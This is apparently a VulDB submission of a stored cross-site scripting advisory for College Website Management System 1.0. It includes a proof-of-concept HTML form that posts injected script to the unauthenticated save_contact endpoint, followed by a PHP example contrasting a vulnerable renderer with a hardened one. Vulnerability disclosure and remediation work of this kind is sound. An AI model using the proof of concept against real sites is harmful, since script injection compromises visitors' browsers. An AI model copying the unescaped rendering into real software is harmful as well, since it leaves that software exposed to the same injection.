Submit #32539: College Website Management System 1.0 - Cross-site Scripting Stored

Title: College Website Management System 1.0 - Cross-site Scripting Stored
Description:

# Exploit Title: College Website Management System 1.0 - Cross-site Scripting Stored
# Date: 13/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux

Title:
================
College Website Management System 1.0 - Cross-site Scripting Stored

Summary:
================
The College Website Management System application is vulnerable to stored cross-site scripting (XSS). The action that saves the site's contact information requires no authentication and does not validate its input, so arbitrary JavaScript can be injected into the stored contact details and is later executed in the browser of every visitor to the contact page, giving an attacker control over client-side browser behaviour.

Severity Level:
================
7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Affected Product:
================
College Website Management System v1.0

Steps to Reproduce:
================
1. Create an HTML file and paste the following code:

    <html>
    <title>CWMS XSS PoC</title>
    <center>
    <h1>CWMS XSS PoC</h1>
    <form action="http://<TARGET>/cwms/classes/Master.php?f=save_contact" method="POST">
    <p>School address<input type="text" name="school_address" placeholder="Inject XSS payload here"></p>
    <p>Telephone<input type="text" name="school_tel_no" placeholder="Inject XSS payload here"></p>
    <p>Email<input type="text" name="school_email" placeholder="Inject XSS payload here"></p>
    <input type="text" name="map_coords" value="10&#46;676033878642961&#44;&#32;122&#46;9520835825518" hidden>
    <button>Submit</button>
    </form>
    </center>
    </html>

   Replace <TARGET> in the form's "action" attribute with the target host and open the file in a browser.
2. Enter JavaScript code in one of the fields and submit the form.
3. Open http://target.com/cwms/?p=contact_us; the submitted content is rendered there.

Note: the application owner was informed of the issue on March 13, 2022; I await a response.
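As an added defensive illustration, not code from the advisory or from the College Website Management System project: a PHP save-and-render path for the contact fields named in the PoC form (school_address, school_tel_no, school_email, map_coords), showing the unescaped rendering pattern that makes stored content executable beside a hardened version that requires an admin session, validates each field and HTML-encodes values at output. The table and column names, the session key admin_id and the sample payload are assumptions constructed for this example.

```php
<?php
// Added example (not the project's own code). Field names come from the
// advisory's PoC form; table, column and session names are assumed.

// Vulnerable pattern, for contrast: stored values are interpolated into the
// page as-is, so anything saved as the address is interpreted as HTML.
function render_contact_vulnerable(array $c): string
{
    return "<p>Address: {$c['school_address']}</p>\n"
         . "<p>Tel: {$c['school_tel_no']}</p>\n"
         . "<p>Email: {$c['school_email']}</p>\n";
}

// HTML-encode a value for a text context; ENT_QUOTES also covers attributes.
function esc(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Validate the submitted fields; returns [cleaned values, error messages].
function validate_contact(array $post): array
{
    $clean = [];
    $errors = [];

    $clean['school_address'] = trim((string)($post['school_address'] ?? ''));
    if ($clean['school_address'] === '' || mb_strlen($clean['school_address']) > 250) {
        $errors[] = 'school_address must be 1-250 characters';
    }

    $clean['school_tel_no'] = trim((string)($post['school_tel_no'] ?? ''));
    if (!preg_match('/^\+?[0-9 ()-]{5,30}$/', $clean['school_tel_no'])) {
        $errors[] = 'school_tel_no may contain only digits, spaces, +, -, ( and )';
    }

    $clean['school_email'] = trim((string)($post['school_email'] ?? ''));
    if (filter_var($clean['school_email'], FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'school_email is not a valid e-mail address';
    }

    $clean['map_coords'] = trim((string)($post['map_coords'] ?? ''));
    if (!preg_match('/^-?\d{1,3}(\.\d+)?,\s*-?\d{1,3}(\.\d+)?$/', $clean['map_coords'])) {
        $errors[] = 'map_coords must be "lat, lng"';
    }

    return [$clean, $errors];
}

// Hardened save action: requires an administrator session (assumed key
// admin_id), rejects invalid input and writes with a parameterised statement.
function save_contact(array $post, array $session, PDO $db): array
{
    if (empty($session['admin_id'])) {
        return ['status' => 'failed', 'msg' => 'Login required'];
    }
    [$clean, $errors] = validate_contact($post);
    if ($errors !== []) {
        return ['status' => 'failed', 'msg' => implode('; ', $errors)];
    }
    $stmt = $db->prepare(
        'UPDATE contact_info SET school_address = :a, school_tel_no = :t,
                school_email = :e, map_coords = :m WHERE id = 1'
    );
    $stmt->execute([':a' => $clean['school_address'], ':t' => $clean['school_tel_no'],
                    ':e' => $clean['school_email'],   ':m' => $clean['map_coords']]);
    return ['status' => 'success'];
}

// Hardened renderer: encoding at output is what stops markup from executing
// even when a free-text field such as the address legitimately contains "<".
function render_contact(array $c): string
{
    return "<p>Address: " . esc($c['school_address']) . "</p>\n"
         . "<p>Tel: " . esc($c['school_tel_no']) . "</p>\n"
         . "<p>Email: " . esc($c['school_email']) . "</p>\n";
}

// Stand-alone demonstration with an in-memory SQLite database and a
// constructed marker payload (not the advisory's own input).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE contact_info (id INTEGER PRIMARY KEY, school_address TEXT,
           school_tel_no TEXT, school_email TEXT, map_coords TEXT)');
$db->exec("INSERT INTO contact_info VALUES (1, 'old', '000', 'a@b.example', '0,0')");

$payload = ['school_address' => '<script>alert(1)</script>', 'school_tel_no' => '123 456',
            'school_email' => 'contact@school.example', 'map_coords' => '10.67, 122.95'];

var_dump(save_contact($payload, [], $db));                 // failed: no admin session
var_dump(save_contact($payload, ['admin_id' => 1], $db));  // success: address is free text

$row = $db->query('SELECT * FROM contact_info WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
echo render_contact_vulnerable($row);  // the stored tag is emitted as live markup
echo render_contact($row);             // the same tag is emitted as escaped text
```

The two renderers make the point of the advisory concrete: the address field is legitimately free text, so validation alone cannot reject every dangerous value, and the authentication check only narrows who can write. The control that actually prevents execution is htmlspecialchars() at the point of output, which turns the stored "<" and ">" into "&lt;" and "&gt;" so the browser shows them as characters rather than parsing a tag. Requires the pdo_sqlite and mbstring extensions, which are enabled in most PHP builds.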
Source: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.ht
User: mrempy (ID 24379)
Submission: 13.03.2022 18:16 (2 years ago)
Moderation: 13.03.2022 20:29 (2 hours later)
Status: Accepted
VulDB Entry: 194846
